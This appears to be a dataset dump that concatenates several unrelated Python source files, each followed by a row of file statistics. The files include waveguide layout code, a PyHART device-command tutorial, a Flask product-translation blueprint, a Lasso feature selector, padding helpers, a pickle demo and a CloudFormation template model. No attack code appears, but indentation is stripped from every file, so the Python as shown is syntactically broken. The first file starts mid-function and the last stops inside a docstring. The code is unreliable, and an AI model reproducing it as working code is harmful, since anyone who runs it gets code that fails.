minimum_length = 30 + 2 * taper_length # don't bother tapering waveguides beyond this length
P1, P2 = line.get_points()
if line.get_length() < minimum_length:
return [_Path([P1, P2], waveguide_width)]
u = P2 - P1
u /= u.norm()
return [
_Taper(P1, P1 + u * taper_length, waveguide_width, taper_width),
_Path([P1 + u * taper_length, P2 - u * taper_length], taper_width),
_Taper(P2 - u * taper_length, P2, taper_width, waveguide_width),
]
def compute_untapered_path(path, waveguide_width):
return [_Path(element.get_points(), waveguide_width) for element in path]
def compute_tapered_path(path, waveguide_width, taper_width, taper_length):
tapered_path = []
for element in path:
if isinstance(element, _Line):
tapered_path += _compute_tapered_line(
element, waveguide_width, taper_width, taper_length
)
elif isinstance(element, _Arc):
tapered_path += [_Path(element.get_points(), waveguide_width)]
return tapered_path
def unique_points(point_list):
if len(point_list) < 2:
return point_list
unique_points = [point_list[0]]
previous_point = point_list[0]
for point in point_list[1:]:
if (point - previous_point).norm() > 1e-4:
unique_points.append(point)
previous_point = point
return unique_points
def layout_waveguide_from_points(
cell, layer, points, width, radius, taper_width=None, taper_length=None
):
assert radius > width / 2, "Please use a radius larger than the half-width"
points = unique_points(points)
if len(points) < 2:
# Nothing to do
return cell
# First, get the list of lines and arcs
try:
rounded_path = compute_rounded_path(points, radius)
except Exception as e:
print("ERROR:", e)
print("Continuing...")
layout_waveguide(cell, layer, points, 0.1)
return cell
# Taper path if necessary
if taper_width is not None and taper_length is not None:
waveguide_path = compute_tapered_path(rounded_path, width, taper_width, taper_length)
else:
waveguide_path = compute_untapered_path(rounded_path, width)
# creating a single path
_draw_points = []
_draw_widths = []
for element in waveguide_path:
points, width = element.points, element.widths
n_points = len(points)
try:
if len(width) == n_points:
_draw_points.extend(points)
_draw_widths.extend(width)
elif len(width) == 2:
_draw_widths.extend(np.linspace(width[0], width[1], n_points))
_draw_points.extend(points)
else:
raise RuntimeError("Internal error detected. Debug please.")
except TypeError:
_draw_points.extend(points)
_draw_widths.extend(np.ones(n_points) * width)
# deleting repeated points
_cur_point = None
_draw_points2 = []
_draw_widths2 = []
for p, w in zip(_draw_points, _draw_widths):
if _cur_point and p == _cur_point:
continue
_draw_points2.append(p)
_draw_widths2.append(w)
_cur_point = p
layout_waveguide(cell, layer, _draw_points2, _draw_widths2, smooth=False)
return cell
def main():
def trace_rounded_path(cell, layer, rounded_path, width):
points = []
for item in rounded_path:
points.extend(item.get_points())
dpath = kdb.DPath(points, width, 0, 0)
cell.shapes(layer).insert(dpath)
def trace_reference_path(cell, layer, points, width):
dpath = kdb.DPath(points, width, 0, 0)
cell.shapes(layer).insert(dpath)
layout = kdb.Layout()
TOP = layout.create_cell("TOP")
layer = kdb.LayerInfo(10, 0)
layerRec = kdb.LayerInfo(1001, 0)
ex, ey = kdb.DPoint(1, 0), kdb.DPoint(0, 1)
points = [0 * ex, 10 * ex, 10 * (ex + ey), 30 * ex]
origin = 0 * ey
points = [origin + point for point in points]
x = compute_rounded_path(points, 3)
trace_rounded_path(TOP, layer, x, 0.5)
trace_reference_path(TOP, layerRec, points, 0.5)
points = [0 * ex, 10 * ex, 5 * (ex - ey), 17 * ex, 30 * ex]
origin = 30 * ey
points = [origin + point for point in points]
x = compute_rounded_path(points, 3)
trace_rounded_path(TOP, layer, x, 0.5)
trace_reference_path(TOP, layerRec, points, 0.5)
radius = 3
for ex2 in (ex, -ex):
points = [2 * ex2]
for d in np.arange(1, 10, 2.5):
origin = points[-1]
displacements = [
4 * radius * ex2,
4 * radius * ex2 + d * ey - 1 * d * ex2,
d * ey,
(d + 2 * radius) * ey,
]
points += [origin + displacement for displacement in displacements]
origin = 15 * ex + 40 * ey
points = [origin + point for point in points]
x = compute_rounded_path(points, radius)
trace_rounded_path(TOP, layer, x, 0.5)
trace_reference_path(TOP, layerRec, points, 0.5)
# Layout tapered waveguide
points = [
0 * ex,
100 * ex,
100 * ex + 20 * ey,
10 * ex + 5 * ey,
10 * ex + 25 * ey,
100 * ex + 30 * ey,
]
# Untapered
origin = 40 * ex
points_ = [origin + point for point in points]
layout_waveguide_from_points(TOP, layer, points_, 0.5, 5)
# Tapered
origin = 40 * ex + 40 * ey
points_ = [origin + point for point in points]
layout_waveguide_from_points(TOP, layer, points_, 0.5, 5, taper_width=3, taper_length=10)
print("Wrote waveguide_rounding.gds")
TOP.write("waveguide_rounding.gds")
if __name__ == "__main__":
main()
| 29.744783 | 128 | 0.585667 | 2,641 | 18,531 | 3.957592 | 0.159031 | 0.029659 | 0.004305 | 0.013395 | 0.237467 | 0.199101 | 0.153272 | 0.135668 | 0.128205 | 0.119786 | 0 | 0.035761 | 0.295289 | 18,531 | 622 | 129 | 29.792605 | 0.764607 | 0.162431 | 0 | 0.210396 | 0 | 0 | 0.032665 | 0.00449 | 0 | 0 | 0 | 0.001608 | 0.014851 | 1 | 0.084158 | false | 0.004951 | 0.032178 | 0.019802 | 0.220297 | 0.007426 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419209cfa7ba87d275b63ba33aa6f02f592a320e | 3,616 | py | Python | PyHART_tutorial/05_device_specific_commands_for_DDS.py | wdehoog/PyHART | abe410e45d66710f65d5499165aab066c9ad9fa3 | [
"MIT"
] | null | null | null | PyHART_tutorial/05_device_specific_commands_for_DDS.py | wdehoog/PyHART | abe410e45d66710f65d5499165aab066c9ad9fa3 | [
"MIT"
] | null | null | null | PyHART_tutorial/05_device_specific_commands_for_DDS.py | wdehoog/PyHART | abe410e45d66710f65d5499165aab066c9ad9fa3 | [
"MIT"
] | null | null | null | #
# In this module is shown how to send a command to an HART device.
# Encode/decode data, logging and manage responses codes.
#
'''
-------------------------------------------------------------------------------
SAME CODE OF EXAMPLE 01 - IGNORE THIS SECTION
This is included to test the example
-------------------------------------------------------------------------------
'''
#
# Standard import. Append the path of PyHART. Since this file is in the folder PyHART_tutorial,
# just go back one folder.
#
import sys
sys.path.append('../')
from PyHART.COMMUNICATION.CommCore import *
from PyHART.COMMUNICATION.Types import *
from PyHART.COMMUNICATION.Utils import *
from PyHART.COMMUNICATION.Common import *
#
# Procedure to list communication ports
#
count, listOfComPorts = ListCOMPort(True)
comport = None
selection = 0
while (comport == None) and (selection != (count + 1)):
print('\nSelect the communication port.')
print('Insert the number related to your choice and press enter.')
try:
selection = int(input())
except:
selection = 0
if (selection == (count + 1)):
print('Leaving application...')
sys.exit()
comport = GetCOMPort(selection, listOfComPorts)
#
# Instantiates and starts the communication object
#
hart = HartMaster(comport, \
MASTER_TYPE.PRIMARY, \
num_retry = 2, \
retriesOnPolling = False, \
autoPrintTransactions = True, \
whereToPrint = WhereToPrint.BOTH, \
logFile = 'terminalLog.log', \
rt_os = False, \
manageRtsCts = None)
hart.Start()
#
# Polling connected devices in range [0..EndPollingAddress] and
# print identification data of the first device found.
#
FoundDevice = None
pollAddress = 0
EndPollingAddress = 3
while (FoundDevice == None) and (pollAddress < EndPollingAddress):
CommunicationResult, SentPacket, RecvPacket, FoundDevice = hart.LetKnowDevice(pollAddress)
pollAddress += 1
if (FoundDevice is not None):
PrintDevice(FoundDevice, hart)
else:
print ('Device not found. Leaving Application...')
sys.exit()
'''
-------------------------------------------------------------------------------
END OF EXAMPLE 01 CODE
-------------------------------------------------------------------------------
'''
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Command 240
#
# Send command 240 with slot 8
retStatus, CommunicationResult, SentPacket, RecvPacket = HartCommand(hart, 240, bytearray([8]))
# Send command 240 with slot 26
retStatus, CommunicationResult, SentPacket, RecvPacket = HartCommand(hart, 240, bytearray([26]))
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Command 79 Simulation Enable
#
slot = 0 # Pressure
simulationEnable = 1 # enable
unit = GetUnitCode('Kilopascal')
status = 0
txdata = bytearray(8)
txdata[0] = slot
txdata[1] = simulationEnable
txdata[2] = unit
txdata[3:6] = FloatToBytearray(34.734)
txdata[7] = status
retStatus, CommunicationResult, SentPacket, RecvPacket = HartCommand(hart, 79, txdata)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Command 79 Simulation Disable
#
txdata = bytearray([slot, not simulationEnable, unit, 0, 0, 0, 0, 0])
retStatus, CommunicationResult, SentPacket, RecvPacket = HartCommand(hart, 79, txdata)
#
# Kills all threads
#
hart.Stop()
| 29.16129 | 97 | 0.555586 | 334 | 3,616 | 6.002994 | 0.45509 | 0.072319 | 0.097257 | 0.095761 | 0.167581 | 0.145636 | 0.145636 | 0.145636 | 0 | 0 | 0 | 0.022636 | 0.242533 | 3,616 | 123 | 98 | 29.398374 | 0.709383 | 0.268529 | 0 | 0.105263 | 0 | 0 | 0.082375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.087719 | 0 | 0.087719 | 0.070175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4192d1cec463e5f4665e763436ee29fbd56e053f | 9,315 | py | Python | productporter/product/views.py | kamidox/weixin_producthunt | 24269da93e75374ee481b1b78257b18abda4d0c7 | [
"BSD-3-Clause"
] | 10 | 2015-01-07T06:01:13.000Z | 2021-02-14T09:11:10.000Z | productporter/product/views.py | kamidox/weixin_producthunt | 24269da93e75374ee481b1b78257b18abda4d0c7 | [
"BSD-3-Clause"
] | 3 | 2015-01-01T09:56:04.000Z | 2015-01-06T01:34:44.000Z | productporter/product/views.py | kamidox/weixin_producthunt | 24269da93e75374ee481b1b78257b18abda4d0c7 | [
"BSD-3-Clause"
] | 5 | 2015-01-01T10:31:50.000Z | 2018-03-09T05:22:16.000Z | #!/bin/env python
# -*- coding: utf-8 -*-
"""
productporter.product.views
~~~~~~~~~~~~~~~~~~~~~~~~~
product blueprint
:copyright: (c) 2014 by the ProductPorter Team.
:license: BSD, see LICENSE for more details.
"""
import datetime
import json
from flask import Blueprint, request, current_app, flash, redirect, \
url_for, jsonify, make_response
from flask.ext.login import current_user
from qiniu import Auth
from productporter.product.phapi import ProductHuntAPI
from productporter.product.models import Product, Tag
from productporter.utils.helper import render_template, pull_and_save_posts, render_markup, \
query_products, can_translate, can_review, is_online
from productporter.utils.decorators import moderator_required
from productporter.user.models import User
product = Blueprint('product', __name__)
def _tag_names(post):
"""return tag names of this post"""
tagnames = []
for tag in post.tags:
if len(tagnames) == 0:
tagnames.append(tag.name)
else:
tagnames.append('; ' + tag.name)
return ''.join(tagnames)
def _render_tags(post):
"""render tags. MUST BE THE SAME of macro 'render_tags' in macro.jinja.html"""
tag_template = '<a class="label label-default" href="%s">%s</a>'
tag_html = []
for tag in post.tags:
tag_html.append(tag_template % \
(url_for('product.tags', tag=tag.name), tag.name))
tag_html.append('<br/><br/>')
return '\n'.join(tag_html)
def _render_contributors(contributers, postid, locked_by, field):
"""render contributors, MUST BE THE SAME of macro 'contributors' in macro.jinja.html"""
div_template = "<div class='translaters-list' data-postid='%s' field='%s'>edit by %s</div>"
user_template = "<a href='%s'>@%s</a>"
user_htmls = []
users = contributers.all()
for user in users:
nickname = user.nickname if user.nickname else user.username
user_htmls.append(user_template % \
(url_for('user.profile', username=user.username), nickname))
if locked_by:
nickname = locked_by.nickname if locked_by.nickname else locked_by.username
user_htmls.append((' - locked by ' + user_template) % \
(url_for('user.profile', username=locked_by.username), nickname))
return div_template % (postid, field, '\n'.join(user_htmls))
def _post_aquire_translate(request):
"""aquire to translate post"""
postid = request.args.get('postid')
field = request.args.get('field', 'ctagline')
current_app.logger.info('aquire translate %s for post %s' % (field, str(postid)))
if not can_translate(current_user):
ret = {
'status': 'error',
'postid': postid,
'error': 'Please sign in first'
}
return make_response(jsonify(**ret), 401)
post = Product.query.filter(Product.postid==postid).first_or_404()
if getattr(post, field + '_locked'):
ret = {
'status': 'error',
'postid': postid,
'error': '%s is locked. Please contact adminitrator.'
}
return make_response(jsonify(**ret), 403)
editing_user = getattr(post, 'editing_' + field + '_user')
if (editing_user) and \
(editing_user.username != current_user.username) and \
(is_online(editing_user)):
ret = {
'status': 'error',
'postid': post.postid,
'error': '%s is editing by %s' % \
(field, editing_user.username)
}
return make_response(jsonify(**ret), 400)
setattr(post, 'editing_' + field + '_user_id', current_user.id)
post.save()
ret = {
'status': 'success',
'postid': post.postid,
'field': field,
'value': getattr(post, field),
'tags': _tag_names(post)
}
return jsonify(**ret)
# translate detail
@product.route('/translate', methods=["GET", "PUT", "POST"])
def translate():
"""
use GET to aquire translation
use PUT/POST to commit translation
:param postid: The postid of product
:param field: The field of operation, could be 'ctagline' or 'cintro'
:param value: The value of translate field
"""
if request.method == 'GET':
return _post_aquire_translate(request)
jsondata = None
try:
jsondata = json.loads(request.data)
except ValueError:
ret = {
'status': 'error',
'message': "invalid json data"
}
return make_response(jsonify(**ret), 405)
postid = jsondata['postid']
field = jsondata['field']
if not can_translate(current_user):
ret = {
'status': 'error',
'postid': postid,
'field': field,
'error': 'Please sign in first'
}
return make_response(jsonify(**ret), 401)
post = Product.query.filter(Product.postid==postid).first_or_404()
try:
canceled = jsondata['canceled']
if canceled:
setattr(post, 'editing_' + field + '_user_id', None)
post.save()
ret = {
'status': 'success',
'postid': post.postid,
'field': field
}
return jsonify(**ret)
except KeyError:
pass
current_app.logger.info('commit %s for post %s' % (field, str(postid)))
# deal with tags
if field == 'ctagline':
post.set_tags(jsondata['tags'])
# deal with other filed data
setattr(post, field, jsondata['value'])
setattr(post, 'editing_' + field + '_user_id', None)
post.save()
getattr(current_user, 'add_' + field + '_product')(post)
ret = {
'status': 'success',
'postid': post.postid,
'field': field,
'value': render_markup(getattr(post, field)),
'contributors': _render_contributors( \
getattr(post, field + '_editors'), post.postid, \
getattr(post, field + '_locked_user'), field),
'tags': _render_tags(post)
}
return jsonify(**ret)
# posts list
@product.route('/', methods=["GET"])
def index():
""" product posts home dashboard """
return redirect(url_for('product.posts'))
# posts list
@product.route('/posts/', methods=["GET"])
def posts():
""" product posts home dashboard """
spec_day = request.args.get('day', '')
day, posts = query_products(spec_day)
post_count = len(posts)
tags = Tag.names()
return render_template('product/posts.jinja.html',
post_count=post_count, posts=posts, day=day, tags=tags)
# posts list
@product.route('/posts/<postid>', methods=["GET"])
def post_intro(postid):
""" product detail information page """
post = Product.query.filter(Product.postid==postid).first_or_404()
tags = Tag.names()
return render_template('product/post_intro.jinja.html', post=post, tags=tags)
#pull products
@product.route('/pull')
def pull():
""" pull data from producthunt.com """
day = request.args.get('day', '')
count = pull_and_save_posts(day)
return "pulled %d posts " % (count)
@product.route('/lock', methods=['GET'])
@moderator_required
def lock():
"""
lock product
:param postid: The postid of product
:param op: Operation, clould be 'lock' or 'unlock'
:param field: Field, could be 'ctagline' or 'cintro'
"""
postid = request.args.get('postid', '')
op = request.args.get('op', 'lock')
field = request.args.get('field', 'ctagline')
post = Product.query.filter(Product.postid==postid).first_or_404()
if op.lower() == 'lock':
setattr(post, field + '_locked', True)
setattr(post, field + '_locked_user_id', current_user.id)
op = 'Unlock'
else:
setattr(post, field + '_locked', False)
setattr(post, field + '_locked_user_id', None)
op = 'Lock'
post.save()
ret = {
'status': 'success',
'postid': post.postid,
'contributors': _render_contributors( \
getattr(post, field + '_editors'), post.postid, \
getattr(post, field + '_locked_user'), field)
}
return jsonify(**ret)
@product.route('/tags/', methods=["GET"])
def tags():
"""show all products"""
return "under construction"
@product.route('/tags/<tagname>', methods=["GET"])
def tags_name(tagname):
"""show all products by selected tag"""
return "under construction"
@product.route('/dailybriefing/<day>', methods=['GET'])
@moderator_required
def dailybriefing(day):
""" Generate daily briefing """
qday, posts = query_products(day)
post_count = len(posts)
# Thanks to contributors
editors = []
for post in posts:
if post.ctagline and post.ctagline_locked:
editors += post.ctagline_editors
# Thank once is enough
editors = {}.fromkeys(editors).keys()
return render_template('product/dailybriefing.jinja.html',
post_count=post_count, posts=posts, day=qday, editors=editors)
@product.route('/qiniutoken', methods=['GET'])
def get_qiniu_token():
q = Auth(current_app.config["QINIU_ACCESS_KEY"], current_app.config["QINIU_SECRET_KEY"])
token = q.upload_token(current_app.config["QINIU_BUCKET"])
ret = {'uptoken': token}
return jsonify(**ret)
| 32.231834 | 95 | 0.615137 | 1,099 | 9,315 | 5.070974 | 0.196542 | 0.019379 | 0.017585 | 0.02243 | 0.362462 | 0.258748 | 0.219271 | 0.171541 | 0.164364 | 0.1274 | 0 | 0.004664 | 0.240365 | 9,315 | 288 | 96 | 32.34375 | 0.782928 | 0.122061 | 0 | 0.338164 | 0 | 0.004831 | 0.152599 | 0.013589 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067633 | false | 0.004831 | 0.048309 | 0 | 0.217391 | 0.009662 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419429d46af11923cde1d968263d403240c3dfee | 2,241 | py | Python | clintk/cat2vec/feature_selection.py | DITEP/db-cleansing | 9a2360d45bc250b9b1ec73ba7efc2d14b3250c74 | [
"MIT"
] | 5 | 2019-04-19T05:45:20.000Z | 2021-11-16T13:22:07.000Z | clintk/cat2vec/feature_selection.py | DITEP/db-cleansing | 9a2360d45bc250b9b1ec73ba7efc2d14b3250c74 | [
"MIT"
] | null | null | null | clintk/cat2vec/feature_selection.py | DITEP/db-cleansing | 9a2360d45bc250b9b1ec73ba7efc2d14b3250c74 | [
"MIT"
] | null | null | null | """
selects parameters with L1 logistic regression
"""
import pandas as pd
from sklearn.base import BaseEstimator
class LassoSelector(BaseEstimator):
"""
This class is made to be used after cat2vec.lasso_gridsearch since it
selects the features from a dataframe that have the most weighted
coefficients (according to a L1-penalized linear model)
It inherits from sklearn.base.BaseEstimator to allow gridsearching the
best `n_features` using a pipeline and a basline classifier
Parameters
----------
n_features : int
number of top features to keep
lasso_coefs : pd.DataFrame
each row is the name of a category and its coef weight in LASSO
model
feature_col : str
name of the feature col (ie name of the categorical variable)
coef_col : str
name of the column of the LASSO coefficients in lasso_coefs dataframe
Examples
--------
>>> dico = {'coef': [0, 4.5, 1.2, 0.3], \
'colnames': ['feat1', 'feat2', 'feat3', 'feat4']}
>>> df = pd.DataFrame(dico)
keeps only feat2 and feat3
>>> selector = LassoSelector(2).fit(df['colnames'], df['coef'])
>>> X = [[0, 0, 1, 0], [1, 1, 0, 0], [0, 1, 0, 0]]
>>> selector.transform(X)
[[0, 1], [1, 0], [1, 0]]
"""
def __init__(self, lasso_coefs, feature_col, coef_col,
n_features=64):
self.n_features = n_features
self.feature_col = feature_col
self.lasso_coefs = lasso_coefs
self.coef_col = coef_col
def fit(self, X, y):
return self
def transform(self, X):
"""
Parameters
----------
X : pd.DataFrame
contains only features
Returns
-------
ndarray
contains the best n_features
"""
self.lasso_coefs['abs_coef'] = abs(self.lasso_coefs[self.coef_col])
self.lasso_coefs.sort_values(['abs_coef'], ascending=False,
inplace=True)
# keeping top features according to lasso
coefs_to_keep = self.lasso_coefs.iloc[:self.n_features, :]
coefs_to_keep = coefs_to_keep[self.feature_col]
return X[coefs_to_keep.values].values
| 29.486842 | 77 | 0.604641 | 294 | 2,241 | 4.465986 | 0.37415 | 0.076161 | 0.063976 | 0.024372 | 0.054836 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023154 | 0.286925 | 2,241 | 75 | 78 | 29.88 | 0.798498 | 0.551986 | 0 | 0 | 0 | 0 | 0.019925 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.111111 | 0.055556 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4197fe5fe8d16fcca6d82bcf73ee4d6614030b79 | 3,407 | py | Python | src/onevision/nn/layer/padding.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
] | 2 | 2022-03-28T09:46:38.000Z | 2022-03-28T14:12:32.000Z | src/onevision/nn/layer/padding.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
] | null | null | null | src/onevision/nn/layer/padding.py | phlong3105/onevision | 90552b64df7213e7fbe23c80ffd8a89583289433 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Padding Layers.
"""
from __future__ import annotations
import math
from typing import Union
import torch.nn.functional as F
from torch import nn
from torch import Tensor
from onevision.factory import PADDING_LAYERS
from onevision.type import Int2T
__all__ = [
"autopad",
"get_padding",
"get_padding_value",
"get_same_padding",
"is_static_pad",
"pad_same"
]
# MARK: - Functional
def autopad(kernel_size: Int2T, padding: Union[str, Int2T, None] = None):
"""Pad to `same`."""
if padding is None:
padding = (kernel_size // 2 if isinstance(kernel_size, int)
else [input // 2 for input in kernel_size]) # auto-pad
return padding
def pad_same(
x : Tensor,
kernel_size: Int2T,
stride : Int2T,
dilation : Int2T = (1, 1),
value : float = 0
):
"""Dynamically pad input with 'same' padding for conv with specified
args.
"""
ih, iw = x.size()[-2:]
pad_h = get_same_padding(ih, kernel_size[0], stride[0], dilation[0])
pad_w = get_same_padding(iw, kernel_size[1], stride[1], dilation[1])
if pad_h > 0 or pad_w > 0:
x = F.pad(
x,
[pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2],
value=value
)
return x
def get_padding_value(
padding: Union[str, Int2T, None], kernel_size: Int2T, **kwargs
) -> tuple[(tuple, int), bool]:
dynamic = False
if isinstance(padding, str):
# For any string padding, the padding will be calculated for you, one
# of three ways
padding = padding.lower()
if padding == "same":
# TF compatible 'SAME' padding, has a performance and GPU memory
# allocation impact
if is_static_pad(kernel_size, **kwargs):
# static case, no extra overhead
padding = get_padding(kernel_size, **kwargs)
else:
# Dynamic 'SAME' padding, has runtime/GPU memory overhead
padding = 0
dynamic = True
elif padding == "valid":
# 'VALID' padding, same as padding=0
padding = 0
else:
# Default to PyTorch style 'same'-ish symmetric padding
padding = get_padding(kernel_size, **kwargs)
return padding, dynamic
def get_padding(kernel_size: int, stride: int = 1, dilation: int = 1, **_) -> int:
"""Calculate symmetric padding for a convolution.
FYI: `**_` mean ignore the rest of the args.
"""
padding = ((stride - 1) + dilation * (kernel_size - 1)) // 2
return padding
def get_same_padding(x: int, kernel_size: int, stride: int, dilation: int) -> int:
"""Calculate asymmetric TensorFlow-like 'same' padding for a convolution.
"""
return max((math.ceil(x / stride) - 1) * stride +
(kernel_size - 1) * dilation + 1 - x, 0)
def is_static_pad(kernel_size: int, stride: int = 1, dilation: int = 1, **_) -> bool:
"""Can `same` padding for given args be done statically?."""
return stride == 1 and (dilation * (kernel_size - 1)) % 2 == 0
# MARK: - Register
PADDING_LAYERS.register(name="zero", module=nn.ZeroPad2d)
PADDING_LAYERS.register(name="reflection", module=nn.ReflectionPad2d)
PADDING_LAYERS.register(name="replication", module=nn.ReplicationPad2d)
| 29.885965 | 85 | 0.606692 | 441 | 3,407 | 4.537415 | 0.297052 | 0.084958 | 0.027986 | 0.029985 | 0.138931 | 0.067966 | 0.034983 | 0.034983 | 0.034983 | 0 | 0 | 0.019433 | 0.275022 | 3,407 | 113 | 86 | 30.150442 | 0.790688 | 0.221016 | 0 | 0.121212 | 0 | 0 | 0.040895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.121212 | 0 | 0.30303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419b7fd6852c60efa1fd82faf32167dd58882039 | 236 | py | Python | demo/use_pickle.py | 1987539447/start-python | 06ee5eb30e7395cd8432e8e33d7209fa855f4ad9 | [
"Apache-2.0"
] | null | null | null | demo/use_pickle.py | 1987539447/start-python | 06ee5eb30e7395cd8432e8e33d7209fa855f4ad9 | [
"Apache-2.0"
] | null | null | null | demo/use_pickle.py | 1987539447/start-python | 06ee5eb30e7395cd8432e8e33d7209fa855f4ad9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# FileName:use_pickle.py
# -*- coding: utf-8 -*-
""" 通过pickle序列化对象"""
import pickle
bob = dict(name='Bob', age=20, score=88)
data = pickle.dumps(bob)
print(data)
re_bob = pickle.loads(data)
print(re_bob)
| 11.8 | 40 | 0.661017 | 36 | 236 | 4.25 | 0.694444 | 0.065359 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029851 | 0.148305 | 236 | 19 | 41 | 12.421053 | 0.731343 | 0.338983 | 0 | 0 | 0 | 0 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
419d836e21b88898e0497e1625d6eddb5fed1199 | 5,349 | py | Python | pycfmodel/model/cf_model.py | donatoaz/pycfmodel | 1586e290b67d2347493dd4a77d2b0c8ee6c0936b | [
"Apache-2.0"
] | null | null | null | pycfmodel/model/cf_model.py | donatoaz/pycfmodel | 1586e290b67d2347493dd4a77d2b0c8ee6c0936b | [
"Apache-2.0"
] | null | null | null | pycfmodel/model/cf_model.py | donatoaz/pycfmodel | 1586e290b67d2347493dd4a77d2b0c8ee6c0936b | [
"Apache-2.0"
] | null | null | null | from datetime import date
from typing import Any, ClassVar, Collection, Dict, List, Optional, Type, Union
from pycfmodel.action_expander import expand_actions
from pycfmodel.constants import AWS_NOVALUE
from pycfmodel.model.base import CustomModel
from pycfmodel.model.parameter import Parameter
from pycfmodel.model.resources.generic_resource import GenericResource
from pycfmodel.model.resources.resource import Resource
from pycfmodel.model.resources.types import ResourceModels
from pycfmodel.model.types import Resolvable
from pycfmodel.resolver import _extended_bool, resolve
class CFModel(CustomModel):
"""
Template that describes AWS infrastructure.
Properties:
- AWSTemplateFormatVersion
- Conditions: Conditions that control behaviour of the template.
- Description: Description for the template.
- Mappings: A 3 level mapping of keys and associated values.
- Metadata: Additional information about the template.
- Outputs: Output values of the template.
- Parameters: Parameters to the template.
- Resources: Stack resources and their properties.
- Rules
- Transform: For serverless applications, specifies the version of the AWS Serverless Application Model (AWS SAM) to use.
More info at [AWS Docs](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/template-anatomy.html)
"""
AWSTemplateFormatVersion: Optional[date]
Conditions: Optional[Dict] = {}
Description: Optional[str] = None
Mappings: Optional[Dict[str, Dict[str, Dict[str, Any]]]] = {}
Metadata: Optional[Dict[str, Dict]] = None
Outputs: Optional[Dict[str, Dict[str, Union[str, Dict]]]] = {}
Parameters: Optional[Dict[str, Parameter]] = {}
Resources: Dict[str, Resolvable[Union[ResourceModels, GenericResource]]] = {}
Rules: Optional[Dict] = {}
Transform: Optional[List]
PSEUDO_PARAMETERS: ClassVar[Dict[str, Union[str, List[str]]]] = {
# default pseudo parameters
"AWS::AccountId": "123456789012",
"AWS::NotificationARNs": [],
"AWS::NoValue": AWS_NOVALUE,
"AWS::Partition": "aws",
"AWS::Region": "eu-west-1",
"AWS::StackId": "",
"AWS::StackName": "",
"AWS::URLSuffix": "amazonaws.com",
}
def resolve(self, extra_params=None) -> "CFModel":
"""
Resolve all intrinsic functions on the template.
Arguments:
extra_params: Values of parameters passed to the Cloudformation.
Returns:
A new CFModel.
"""
extra_params = {} if extra_params is None else extra_params
# default parameters
params = {}
for key, parameter in self.Parameters.items():
passed_value = extra_params.pop(key, None)
ref_value = parameter.get_ref_value(passed_value)
if ref_value is not None:
params[key] = ref_value
extended_parameters = {**self.PSEUDO_PARAMETERS, **params, **extra_params}
dict_value = self.dict()
if self.Conditions:
conditions = dict_value.pop("Conditions")
else:
conditions = {}
resolved_conditions = {
key: _extended_bool(resolve(value, extended_parameters, self.Mappings, {}))
for key, value in conditions.items()
}
resources = dict_value.pop("Resources")
resolved_resources = {
key: resolve(value, extended_parameters, self.Mappings, resolved_conditions)
for key, value in resources.items()
}
return CFModel(**dict_value, Conditions=resolved_conditions, Resources=resolved_resources)
def expand_actions(self) -> "CFModel":
"""
Returns a model which has expanded all wildcards (`*`) to get all implied actions for every resource.
For example:\n
- a model containing `s3:*` will be expanded to list all the possible S3 actions.
- a model containing `s3:Get*` will be expanded to all the `Get*` actions only.
This method can handle the cases of both `Action` and `NotAction`.
[Known AWS Actions](https://github.com/Skyscanner/pycfmodel/blob/master/pycfmodel/cloudformation_actions.py).
These known actions can be updated by executing:
```
